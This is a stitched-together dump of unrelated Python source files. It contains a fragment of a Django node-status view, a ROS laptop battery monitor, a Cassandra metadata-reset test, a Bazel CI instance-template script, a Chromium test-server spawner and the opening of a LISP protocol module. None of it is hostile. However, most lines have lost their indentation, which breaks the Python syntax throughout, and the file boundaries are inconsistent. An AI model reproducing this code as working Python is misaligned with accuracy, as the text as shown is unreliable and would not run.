        except requests.RequestException:
node.status = 'Offline'
node.save()
# We use threads to optimize our TTFB (time to first byte).
threads = []
for node in nodes:
thread = Thread(target=thread_func, args=(node,))
threads.append(thread)
thread.start()
for tr in threads:
tr.join()
    # We initialize our database by adding 10 default nodes, so their ids fall
    # in the range [1, ..., 10]; hence the id__lt=11 filter below.
return render(request, 'noobcash/homepage.html', {
'nodes': Node.objects.filter(id__lt=11)
}
)
|
laptop_battery.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
##\author Kevin Watts
##\brief Monitors laptop battery status
from __future__ import division
import roslib
from collections import deque
import threading
import copy
import yaml
import math
import rospy
import os # to check path existence
from linux_hardware.msg import LaptopChargeStatus
from diagnostic_msgs.msg import DiagnosticStatus, DiagnosticArray, KeyValue
def _strip_Ah(raw_val):
if 'mAh' in raw_val:
rv = float(raw_val.rstrip('mAh').strip()) / 1000.0
elif 'Ah' in raw_val:
rv = float(raw_val.rstrip('Ah').strip())
elif 'mWh' in raw_val:
rv = float(raw_val.rstrip('mWh').strip()) / 1000.0
elif 'Wh' in raw_val:
rv = float(raw_val.rstrip('Wh').strip())
else:
raise Exception('Value %s did not have supported units. (mAh,Ah,mWh,Wh)' % raw_val)
return rv
def _strip_V(raw_val):
if 'mV' in raw_val:
rv = float(raw_val.rstrip('mV').strip()) / 1000.0
elif 'V' in raw_val:
rv = float(raw_val.rstrip('V').strip())
else:
raise Exception('Value %s did not have "V" or "mV"' % raw_val)
return rv
def _strip_A(raw_val):
if 'mA' in raw_val:
rv = float(raw_val.rstrip('mA').strip()) / 1000.0
elif 'A' in raw_val:
rv = float(raw_val.rstrip('A').strip())
elif 'mW' in raw_val:
rv = float(raw_val.rstrip('mW').strip()) / 1000.0
elif 'W' in raw_val:
rv = float(raw_val.rstrip('W').strip())
else:
        raise Exception('Value %s did not have supported units. (mA,A,mW,W)' % raw_val)
return rv
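# Read a battery file from /proc and normalize tabs to spaces so the
# "key: value" output can be parsed as YAML by the callers below.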
def slerp(filename):
f = open(filename, 'r')
data = f.read()
f.close()
data = data.replace('\t', ' ')
return data
def _read_string(filename, default=""):
if not os.access(filename, os.F_OK):
return default
f = open(filename, 'r')
data = f.read()
f.close()
return data
def _read_number(filename, default=0):
try:
data = int(_read_string(filename))
return data
    except ValueError:
return default
def _check_battery_info(_battery_acpi_path):
if _battery_acpi_path.startswith('/proc'):
if os.access(_battery_acpi_path, os.F_OK):
o = slerp(_battery_acpi_path+'/info')
else:
raise Exception(_battery_acpi_path+' does not exist')
        batt_info = yaml.safe_load(o)
design_capacity = _strip_Ah(batt_info.get('design capacity', '0 mAh'))
last_full_capacity = _strip_Ah(batt_info.get('last full capacity', '0 mAh'))
else:
        design_capacity = _read_number(_battery_acpi_path + '/energy_full_design')
        last_full_capacity = _read_number(_battery_acpi_path + '/energy_full')
return (design_capacity, last_full_capacity)
state_to_val = {'charged': LaptopChargeStatus.CHARGED,
'full': LaptopChargeStatus.CHARGED,
'charging': LaptopChargeStatus.CHARGING,
'discharging': LaptopChargeStatus.DISCHARGING,
'unknown': LaptopChargeStatus.CHARGING, }
diag_level_to_msg = { DiagnosticStatus.OK: 'OK',
DiagnosticStatus.WARN: 'Warning',
DiagnosticStatus.ERROR: 'Error' }
def _check_battery_state(_battery_acpi_path):
"""
@return LaptopChargeStatus
"""
rv = LaptopChargeStatus()
if _battery_acpi_path.startswith('/proc'):
if os.access(_battery_acpi_path, os.F_OK):
o = slerp(_battery_acpi_path+'/state')
else:
raise Exception(_battery_acpi_path+' does not exist')
        batt_info = yaml.safe_load(o)
state = batt_info.get('charging state', 'discharging')
rv.charge_state = state_to_val.get(state, 0)
rv.rate = _strip_A(batt_info.get('present rate', '-1 mA'))
if rv.charge_state == LaptopChargeStatus.DISCHARGING:
rv.rate = math.copysign(rv.rate, -1) # Need to set discharging rate to negative
rv.charge = _strip_Ah(batt_info.get('remaining capacity', '-1 mAh')) # /energy_now
rv.voltage = _strip_V(batt_info.get('present voltage', '-1 mV')) # /voltage_now
rv.present = batt_info.get('present', False) # /present
rv.header.stamp = rospy.get_rostime()
else:
state = _read_string(_battery_acpi_path+'/status', 'discharging').lower()
rv.charge_state = state_to_val.get(state, 0)
rv.rate = _read_number(_battery_acpi_path + '/power_now')
if rv.charge_state == LaptopChargeStatus.DISCHARGING:
rv.rate = math.copysign(rv.rate, -1) # Need to set discharging rate to negative
rv.charge = _read_number(_battery_acpi_path + '/energy_now')
rv.voltage = _read_number(_battery_acpi_path + '/voltage_now')
rv.present = _read_number(_battery_acpi_path + '/present') == 1
rv.header.stamp = rospy.get_rostime()
return rv
def _laptop_charge_to_diag(laptop_msg):
rv = DiagnosticStatus()
rv.level = DiagnosticStatus.OK
rv.message = 'OK'
rv.name = 'Laptop Battery'
if not laptop_msg.present:
rv.level = DiagnosticStatus.ERROR
rv.message = 'Laptop battery missing'
rv.values.append(KeyValue('Voltage (V)', str(laptop_msg.voltage)))
rv.values.append(KeyValue('Current (A)', str(laptop_msg.rate)))
rv.values.append(KeyValue('Charge (Ah)', str(laptop_msg.charge)))
rv.values.append(KeyValue('Capacity (Ah)', str(laptop_msg.capacity)))
rv.values.append(KeyValue('Design Capacity (Ah)', str(laptop_msg.design_capacity)))
return rv
class LaptopBatteryMonitor(object):
def __init__(self):
self._mutex = threading.Lock()
self._last_info_update = 0
self._last_state_update = 0
self._msg = LaptopChargeStatus()
self._power_pub = rospy.Publisher('laptop_charge', LaptopChargeStatus, latch=True)
self._diag_pub = rospy.Publisher('/diagnostics', DiagnosticArray)
# Battery info
self._batt_acpi_path = rospy.get_param('~acpi_path', "/proc/acpi/battery/BAT1")
self._batt_design_capacity = 0
self._batt_last_full_capacity = 0
self._last_info_update = 0
self._batt_info_rate = 1 / 60.0
self._batt_info_thread = threading.Thread(target=self._check_batt_info)
self._batt_info_thread.daemon = True
self._batt_info_thread.start()
# Battery state
self._batt_state_rate = 1 / 5.0
self._batt_state_thread = threading.Thread(target=self._check_batt_state)
self._batt_state_thread.daemon = True
self._batt_state_thread.start()
def _check_batt_info(self):
rate = rospy.Rate(self._batt_info_rate)
while not rospy.is_shutdown():
try:
design_cap, last_full_cap = _check_battery_info(self._batt_acpi_path)
with self._mutex:
self._batt_last_full_capacity = last_full_cap
self._batt_design_capacity = design_cap
self._last_info_update = rospy.get_time()
            except Exception as e:
rospy.logwarn('Battery : unable to check laptop battery info [%s]' % e)
rospy.signal_shutdown('Battery : unable to check laptop battery info [%s]' % e)
rate.sleep()
def _check_batt_state(self):
rate = rospy.Rate(self._batt_state_rate)
while not rospy.is_shutdown():
try:
msg = _check_battery_state(self._batt_acpi_path)
with self._mutex:
self._msg = msg
self._last_state_update = rospy.get_time()
            except Exception as e:
rospy.logwarn('Battery : unable to check laptop battery state [%s]' % e)
rospy.signal_shutdown('Battery : unable to check laptop battery state [%s]' % e)
rate.sleep()
def update(self):
with self._mutex:
diag = DiagnosticArray()
diag.header.stamp = rospy.get_rostime()
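            # Treat the cached readings as stale when they have not been
            # refreshed within five polling periods (the *_rate values are in Hz).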
info_update_ok = rospy.get_time() - self._last_info_update < 5.0 / self._batt_info_rate
state_update_ok = rospy.get_time() - self._last_state_update < 5.0 / self._batt_state_rate
if info_update_ok:
self._msg.design_capacity = self._batt_design_capacity
self._msg.capacity = self._batt_last_full_capacity
else:
self._msg.design_capacity = 0.0
self._msg.capacity = 0.0
if info_update_ok and state_update_ok and self._msg.capacity != 0:
self._msg.percentage = int(self._msg.charge / self._msg.capacity * 100.0)
diag_stat = _laptop_charge_to_diag(self._msg)
if not info_update_ok or not state_update_ok:
diag_stat.level = DiagnosticStatus.ERROR
diag_stat.message = 'Laptop battery data stale'
diag.status.append(diag_stat)
self._diag_pub.publish(diag)
self._power_pub.publish(self._msg)
if __name__ == '__main__':
rospy.init_node('laptop_battery')
bm = LaptopBatteryMonitor()
try:
r = rospy.Rate(1.0)
while not rospy.is_shutdown():
bm.update()
r.sleep()
except KeyboardInterrupt:
pass
except Exception:
import traceback
traceback.print_exc()
|
metadata_test.py
|
import threading
import time
import logging
import pytest
from dtest import Tester
logger = logging.getLogger(__name__)
class TestMetadata(Tester):
def force_compact(self):
cluster = self.cluster
(node1, node2) = cluster.nodelist()
node1.nodetool("compact keyspace1 standard1")
def force_repair(self):
cluster = self.cluster
(node1, node2) = cluster.nodelist()
node1.nodetool('repair keyspace1 standard1')
def do_read(self):
cluster = self.cluster
(node1, node2) = cluster.nodelist()
node1.stress(['read', 'no-warmup', 'n=30000', '-schema', 'replication(factor=2)', 'compression=LZ4Compressor',
'-rate', 'threads=1'])
@pytest.mark.skip(reason='hangs CI')
def test_metadata_reset_while_compact(self):
"""
Resets the schema while a compact, read and repair happens.
All kinds of glorious things can fail.
"""
# while the schema is being reset, there will inevitably be some
# queries that will error with this message
self.fixture_dtest_setup.ignore_log_patterns = ['.*Unknown keyspace/cf pair.*']
cluster = self.cluster
cluster.populate(2).start()
(node1, node2) = cluster.nodelist()
node1.nodetool("disableautocompaction")
node1.nodetool("setcompactionthroughput 1")
for i in range(3):
node1.stress(['write', 'no-warmup', 'n=30000', '-schema', 'replication(factor=2)',
'compression=LZ4Compressor', '-rate', 'threads=5', '-pop', 'seq=1..30000'])
node1.flush()
thread = threading.Thread(target=self.force_compact)
thread.start()
time.sleep(1)
thread2 = threading.Thread(target=self.force_repair)
thread2.start()
time.sleep(5)
thread3 = threading.Thread(target=self.do_read)
thread3.start()
time.sleep(5)
node1.nodetool("resetlocalschema")
thread.join()
thread2.join()
thread3.join()
|
create_instance_template.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from datetime import datetime
import os
import queue
import sys
import threading
import yaml
import gcloud
WORK_QUEUE = queue.Queue()
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
# We take a few keys out of the config item. The rest is passed
# as-is to create_instance_template() and thus to the gcloud
# command line tool.
del item["count"]
instance_group_name = item.pop("name")
project = item.pop("project")
zone = item.pop("zone", None)
region = item.pop("region", None)
del item["health_check"]
del item["initial_delay"]
if not project:
raise Exception("Invalid instance config, no project name set")
if not zone and not region:
raise Exception("Invalid instance config, either zone or region must be specified")
timestamp = datetime.now().strftime("%Y%m%dt%H%M%S")
template_name = "{}-{}".format(instance_group_name, timestamp)
# Create the new instance template.
gcloud.create_instance_template(template_name, project=project, **item)
print("Created instance template {}".format(template_name))
finally:
WORK_QUEUE.task_done()
def read_config_file():
path = os.path.join(os.getcwd(), "instances.yml")
with open(path, "rb") as fd:
content = fd.read().decode("utf-8")
return yaml.safe_load(content)
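# Expected instances.yml layout (inferred from the keys used below): a
# "default_vm" mapping with shared settings plus an "instance_groups" list;
# each entry, merged with default_vm, must provide "name", "project", "count",
# "health_check", "initial_delay" and either "zone" or "region", and any
# remaining keys are passed straight through to gcloud.create_instance_template().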
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
parser = argparse.ArgumentParser(description="Bazel CI Instance Creation")
parser.add_argument(
"names",
type=str,
nargs="*",
help="List of instance (group) names that should be created. "
'These values must correspond to "name" entries in the '
'Yaml configuration, e.g. "bk-docker".',
)
args = parser.parse_args(argv)
config = read_config_file()
# Verify names passed on the command-line.
valid_names = [item["name"] for item in config["instance_groups"]]
for name in args.names:
if name not in valid_names:
print("Unknown instance name: {}!".format(name))
print("\nValid instance names are: {}".format(" ".join(valid_names)))
return 1
if not args.names:
parser.print_help()
print("\nValid instance names are: {}".format(" ".join(valid_names)))
return 1
# Put VM creation instructions into the work queue.
for instance in config["instance_groups"]:
if instance["name"] not in args.names:
continue
WORK_QUEUE.put({**config["default_vm"], **instance})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
chrome_test_server_spawner.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A "Test Server Spawner" that handles killing/stopping per-test test servers.
It's used to accept requests from the device to spawn and kill instances of the
chrome test server on the host.
"""
import BaseHTTPServer
import json
import logging
import os
import select
import struct
import subprocess
import threading
import time
import urlparse
import constants
from forwarder import Forwarder
import ports
# Paths that are needed to import necessary modules when launching a testserver.
os.environ['PYTHONPATH'] = os.environ.get('PYTHONPATH', '') + (':%s:%s:%s:%s:%s'
% (os.path.join(constants.CHROME_DIR, 'third_party'),
os.path.join(constants.CHROME_DIR, 'third_party', 'tlslite'),
os.path.join(constants.CHROME_DIR, 'third_party', 'pyftpdlib', 'src'),
os.path.join(constants.CHROME_DIR, 'net', 'tools', 'testserver'),
os.path.join(constants.CHROME_DIR, 'sync', 'tools', 'testserver')))
SERVER_TYPES = {
'http': '',
'ftp': '-f',
'sync': '', # Sync uses its own script, and doesn't take a server type arg.
'tcpecho': '--tcp-echo',
'udpecho': '--udp-echo',
}
# The timeout (in seconds) of starting up the Python test server.
TEST_SERVER_STARTUP_TIMEOUT = 10
def _CheckPortStatus(port, expected_status):
"""Returns True if port has expected_status.
Args:
port: the port number.
expected_status: boolean of expected status.
Returns:
Returns True if the status is expected. Otherwise returns False.
"""
for timeout in range(1, 5):
if ports.IsHostPortUsed(port) == expected_status:
return True
time.sleep(timeout)
return False
def _GetServerTypeCommandLine(server_type):
"""Returns the command-line by the given server type.
Args:
server_type: the server type to be used (e.g. 'http').
Returns:
A string containing the command-line argument.
"""
if server_type not in SERVER_TYPES:
raise NotImplementedError('Unknown server type: %s' % server_type)
if server_type == 'udpecho':
raise Exception('Please do not run UDP echo tests because we do not have '
'a UDP forwarder tool.')
return SERVER_TYPES[server_type]
class TestServerThread(threading.Thread):
"""A thread to run the test server in a separate process."""
def __init__(self, ready_event, arguments, adb, tool, build_type):
"""Initialize TestServerThread with the following argument.
Args:
ready_event: event which will be set when the test server is ready.
arguments: dictionary of arguments to run the test server.
adb: instance of AndroidCommands.
tool: instance of runtime error detection tool.
build_type: 'Release' or 'Debug'.
"""
threading.Thread.__init__(self)
self.wait_event = threading.Event()
self.stop_flag = False
self.ready_event = ready_event
self.ready_event.clear()
self.arguments = arguments
self.adb = adb
self.tool = tool
    self.process = None
self.is_ready = False
self.host_port = self.arguments['port']
assert isinstance(self.host_port, int)
self._test_server_forwarder = None
# The forwarder device port now is dynamically allocated.
self.forwarder_device_port = 0
# Anonymous pipe in order to get port info from test server.
self.pipe_in = None
self.pipe_out = None
self.command_line = []
self.build_type = build_type
def _WaitToStartAndGetPortFromTestServer(self):
"""Waits for the Python test server to start and gets the port it is using.
The port information is passed by the Python test server with a pipe given
by self.pipe_out. It is written as a result to |self.host_port|.
Returns:
Whether the port used by the test server was successfully fetched.
"""
assert self.host_port == 0 and self.pipe_out and self.pipe_in
(in_fds, _, _) = select.select([self.pipe_in, ], [], [],
TEST_SERVER_STARTUP_TIMEOUT)
if len(in_fds) == 0:
      logging.error('Timed out waiting for the Python test server to start.')
return False
# First read the data length as an unsigned 4-byte value. This
# is _not_ using network byte ordering since the Python test server packs
# size as native byte order and all Chromium platforms so far are
# configured to use little-endian.
# TODO(jnd): Change the Python test server and local_test_server_*.cc to
# use a unified byte order (either big-endian or little-endian).
data_length = os.read(self.pipe_in, struct.calcsize('=L'))
if data_length:
(data_length,) = struct.unpack('=L', data_length)
assert data_length
if not data_length:
logging.error('Failed to get length of server data.')
return False
port_json = os.read(self.pipe_in, data_length)
if not port_json:
logging.error('Failed to get server data.')
return False
logging.info('Got port json data: %s', port_json)
port_json = json.loads(port_json)
if port_json.has_key('port') and isinstance(port_json['port'], int):
self.host_port = port_json['port']
return _CheckPortStatus(self.host_port, True)
logging.error('Failed to get port information from the server data.')
return False
def _GenerateCommandLineArguments(self):
"""Generates the command line to run the test server.
Note that all options are processed by following the definitions in
testserver.py.
"""
if self.command_line:
return
# The following arguments must exist.
type_cmd = _GetServerTypeCommandLine(self.arguments['server-type'])
if type_cmd:
self.command_line.append(type_cmd)
self.command_line.append('--port=%d' % self.host_port)
# Use a pipe to get the port given by the instance of Python test server
# if the test does not specify the port.
if self.host_port == 0:
(self.pipe_in, self.pipe_out) = os.pipe()
self.command_line.append('--startup-pipe=%d' % self.pipe_out)
self.command_line.append('--host=%s' % self.arguments['host'])
data_dir = self.arguments['data-dir'] or 'chrome/test/data'
if not os.path.isabs(data_dir):
data_dir = os.path.join(constants.CHROME_DIR, data_dir)
self.command_line.append('--data-dir=%s' % data_dir)
# The following arguments are optional depending on the individual test.
if self.arguments.has_key('log-to-console'):
self.command_line.append('--log-to-console')
if self.arguments.has_key('auth-token'):
self.command_line.append('--auth-token=%s' % self.arguments['auth-token'])
if self.arguments.has_key('https'):
self.command_line.append('--https')
if self.arguments.has_key('cert-and-key-file'):
self.command_line.append('--cert-and-key-file=%s' % os.path.join(
constants.CHROME_DIR, self.arguments['cert-and-key-file']))
if self.arguments.has_key('ocsp'):
self.command_line.append('--ocsp=%s' % self.arguments['ocsp'])
if self.arguments.has_key('https-record-resume'):
self.command_line.append('--https-record-resume')
if self.arguments.has_key('ssl-client-auth'):
self.command_line.append('--ssl-client-auth')
if self.arguments.has_key('tls-intolerant'):
self.command_line.append('--tls-intolerant=%s' %
self.arguments['tls-intolerant'])
if self.arguments.has_key('ssl-client-ca'):
for ca in self.arguments['ssl-client-ca']:
self.command_line.append('--ssl-client-ca=%s' %
os.path.join(constants.CHROME_DIR, ca))
if self.arguments.has_key('ssl-bulk-cipher'):
for bulk_cipher in self.arguments['ssl-bulk-cipher']:
self.command_line.append('--ssl-bulk-cipher=%s' % bulk_cipher)
def run(self):
logging.info('Start running the thread!')
self.wait_event.clear()
self._GenerateCommandLineArguments()
command = constants.CHROME_DIR
if self.arguments['server-type'] == 'sync':
command = [os.path.join(command, 'sync', 'tools', 'testserver',
'sync_testserver.py')] + self.command_line
else:
command = [os.path.join(command, 'net', 'tools', 'testserver',
'testserver.py')] + self.command_line
logging.info('Running: %s', command)
self.process = subprocess.Popen(command)
if self.process:
if self.pipe_out:
self.is_ready = self._WaitToStartAndGetPortFromTestServer()
else:
self.is_ready = _CheckPortStatus(self.host_port, True)
if self.is_ready:
self._test_server_forwarder = Forwarder(self.adb, self.build_type)
self._test_server_forwarder.Run(
[(0, self.host_port)], self.tool, '127.0.0.1')
# Check whether the forwarder is ready on the device.
self.is_ready = False
device_port = self._test_server_forwarder.DevicePortForHostPort(
self.host_port)
if device_port:
for timeout in range(1, 5):
if ports.IsDevicePortUsed(self.adb, device_port, 'LISTEN'):
self.is_ready = True
self.forwarder_device_port = device_port
break
time.sleep(timeout)
# Wake up the request handler thread.
self.ready_event.set()
# Keep thread running until Stop() gets called.
while not self.stop_flag:
time.sleep(1)
if self.process.poll() is None:
self.process.kill()
if self._test_server_forwarder:
self._test_server_forwarder.Close()
self.process = None
self.is_ready = False
if self.pipe_out:
os.close(self.pipe_in)
os.close(self.pipe_out)
self.pipe_in = None
self.pipe_out = None
logging.info('Test-server has died.')
self.wait_event.set()
def Stop(self):
"""Blocks until the loop has finished.
Note that this must be called in another thread.
"""
if not self.process:
return
self.stop_flag = True
self.wait_event.wait()
class SpawningServerRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""A handler used to process http GET/POST request."""
def _SendResponse(self, response_code, response_reason, additional_headers,
contents):
"""Generates a response sent to the client from the provided parameters.
Args:
response_code: number of the response status.
response_reason: string of reason description of the response.
additional_headers: dict of additional headers. Each key is the name of
the header, each value is the content of the header.
contents: string of the contents we want to send to client.
"""
self.send_response(response_code, response_reason)
self.send_header('Content-Type', 'text/html')
# Specify the content-length as without it the http(s) response will not
# be completed properly (and the browser keeps expecting data).
self.send_header('Content-Length', len(contents))
for header_name in additional_headers:
self.send_header(header_name, additional_headers[header_name])
self.end_headers()
self.wfile.write(contents)
self.wfile.flush()
def _StartTestServer(self):
"""Starts the test server thread."""
logging.info('Handling request to spawn a test server.')
content_type = self.headers.getheader('content-type')
if content_type != 'application/json':
raise Exception('Bad content-type for start request.')
content_length = self.headers.getheader('content-length')
if not content_length:
content_length = 0
try:
content_length = int(content_length)
except:
raise Exception('Bad content-length for start request.')
logging.info(content_length)
test_server_argument_json = self.rfile.read(content_length)
logging.info(test_server_argument_json)
assert not self.server.test_server_instance
ready_event = threading.Event()
self.server.test_server_instance = TestServerThread(
ready_event,
json.loads(test_server_argument_json),
self.server.adb,
self.server.tool,
self.server.build_type)
self.server.test_server_instance.setDaemon(True)
self.server.test_server_instance.start()
ready_event.wait()
if self.server.test_server_instance.is_ready:
self._SendResponse(200, 'OK', {}, json.dumps(
{'port': self.server.test_server_instance.forwarder_device_port,
'message': 'started'}))
logging.info('Test server is running on port: %d.',
self.server.test_server_instance.host_port)
else:
self.server.test_server_instance.Stop()
self.server.test_server_instance = None
self._SendResponse(500, 'Test Server Error.', {}, '')
      logging.info('Encountered a problem while starting the test server.')
def _KillTestServer(self):
"""Stops the test server instance."""
# There should only ever be one test server at a time. This may do the
# wrong thing if we try and start multiple test servers.
if not self.server.test_server_instance:
return
port = self.server.test_server_instance.host_port
logging.info('Handling request to kill a test server on port: %d.', port)
self.server.test_server_instance.Stop()
# Make sure the status of test server is correct before sending response.
if _CheckPortStatus(port, False):
self._SendResponse(200, 'OK', {}, 'killed')
logging.info('Test server on port %d is killed', port)
else:
self._SendResponse(500, 'Test Server Error.', {}, '')
      logging.info('Encountered a problem while killing the test server.')
self.server.test_server_instance = None
def do_POST(self):
parsed_path = urlparse.urlparse(self.path)
action = parsed_path.path
logging.info('Action for POST method is: %s.', action)
if action == '/start':
self._StartTestServer()
else:
self._SendResponse(400, 'Unknown request.', {}, '')
      logging.info('Encountered unknown request: %s.', action)
def do_GET(self):
parsed_path = urlparse.urlparse(self.path)
action = parsed_path.path
params = urlparse.parse_qs(parsed_path.query, keep_blank_values=1)
logging.info('Action for GET method is: %s.', action)
for param in params:
logging.info('%s=%s', param, params[param][0])
if action == '/kill':
self._KillTestServer()
elif action == '/ping':
# The ping handler is used to check whether the spawner server is ready
# to serve the requests. We don't need to test the status of the test
# server when handling ping request.
self._SendResponse(200, 'OK', {}, 'ready')
logging.info('Handled ping request and sent response.')
else:
self._SendResponse(400, 'Unknown request', {}, '')
      logging.info('Encountered unknown request: %s.', action)
class SpawningServer(object):
"""The class used to start/stop a http server."""
def __init__(self, test_server_spawner_port, adb, tool, build_type):
logging.info('Creating new spawner on port: %d.', test_server_spawner_port)
self.server = BaseHTTPServer.HTTPServer(('', test_server_spawner_port),
SpawningServerRequestHandler)
self.port = test_server_spawner_port
self.server.adb = adb
self.server.tool = tool
self.server.test_server_instance = None
self.server.build_type = build_type
def _Listen(self):
logging.info('Starting test server spawner')
self.server.serve_forever()
def Start(self):
"""Starts the test server spawner."""
listener_thread = threading.Thread(target=self._Listen)
listener_thread.setDaemon(True)
listener_thread.start()
time.sleep(1)
def Stop(self):
"""Stops the test server spawner.
Also cleans the server state.
"""
self.CleanupState()
self.server.shutdown()
def CleanupState(self):
"""Cleans up the spawning server state.
This should be called if the test server spawner is reused,
to avoid sharing the test server instance.
"""
if self.server.test_server_instance:
self.server.test_server_instance.Stop()
self.server.test_server_instance = None
lisp.py
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and the second has lisp_interface() values indexed by an instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time the g, p, and public-key values are created. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
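#
# For illustration only (the RLOC address and port below are hypothetical),
# an encap entry might look like:
#
# >>> lisp_crypto_keys_by_rloc_encap["10.0.0.2:4341"] = [None, key1, None, None]
#
# where key1 is the key state negotiated for key-id 1 and the other three
# slots are unused key-ids.
#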
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# The "lisp xtr-parameters" command option register-reachable-rtrs has the
# opposite polarity of lisp_register_all_rtrs. So by default we do not consider
# RLOC-probing reachability status when registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag indicates that when a map-cache
# entry is created or updated, we write specific information to, say, a
# Broadcom chip that will do VXLAN encapsulation. This is a way to get
# existing hardware to do L3 overlays with the LISP control-plane when all
# it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
